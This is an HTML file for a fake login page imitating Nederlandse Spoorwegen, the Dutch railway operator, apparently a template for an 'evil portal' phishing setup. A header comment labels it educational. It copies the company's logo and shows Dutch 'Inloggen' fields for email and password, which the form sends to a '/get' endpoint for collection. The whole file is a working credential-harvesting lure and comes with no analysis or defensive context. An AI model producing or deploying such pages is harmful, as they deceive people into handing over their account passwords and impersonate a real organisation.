<!-- Edited and adapted by : https://github.com/Deuthe for educational purposes. --> 
<!DOCTYPE html>

<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1"> 
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFB519;
}

.container {
  max-width: 400px;
  margin: auto;
  background-color: white;
  padding: 20px; 
  border-radius: 5px;
}

#logo {
  text-align: center;
  margin-bottom: 20px;  
}

h1 {
  text-align: center;
  font-size: 24px;
  font-weight: 300;
  color: #1e1967;
  margin-top: 0;
} 

h2 {
  text-align: center;
  font-size: 16px;
  font-weight: 200;
  color: #888;
  margin-top: 5px;
}

input {
  width: 100%;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 5px;
  box-sizing: border-box;
  margin-top: 10px; 
  font-size: 16px;
}

button {
  background-color: #FFB519;
  color: white;
  padding: 14px 20px;
  margin: 8px 0;
  border: none;
  cursor: pointer;
  width: 100%;
  font-size: 16px;
}

button:hover {
  background-color: #D69815;
}

span {
  text-align: center;
  font-size: 16px;
  font-weight: 200;
  color: #1e1967;
  margin-top: 5px;
}

</style>
</head>
<body>

<div class="container">

<div id="logo">
  <svg xmlns="http://www.w3.org/2000/svg" width="153.399" height="60" viewBox="0 0 51.133 20"><defs><style>.a{fill:#003082;}</style></defs><title>Asset 1</title><path class="a" d="M22.358,9.6A5.543,5.543,0,0,0,18.448,8H7.62l4.01-4H21.757a1.612,1.612,0,0,1,1.1.5l5.915,5.9a5.543,5.543,0,0,0,3.91,1.6H43.513L39.5,16H29.376a1.612,1.612,0,0,1-1.1-.5Zm3.108,8.7a6.1,6.1,0,0,0,3.91,1.7h11.73L51.133,10,41.107,0H35.492l8.021,8H32.685a2.109,2.109,0,0,1-1.1-.4L25.667,1.7A6.1,6.1,0,0,0,21.757,0H10.026L0,10,10.026,20h5.615L7.62,12H18.448a2.109,2.109,0,0,1,1.1.4Z"/></svg>
</div>

<h1>Welkom bij Nederlandse Spoorwegen </h1>

<span>Inloggen</span>
<form action="/get">

  <input type="text" name="email" placeholder="E-mailadres" required>
  
  <input type="password" name="password" placeholder="Wachtwoord" required>

  <button type="submit">Inloggen</button>
  
</form>
<h1></h1>
</div>

</body>
</html>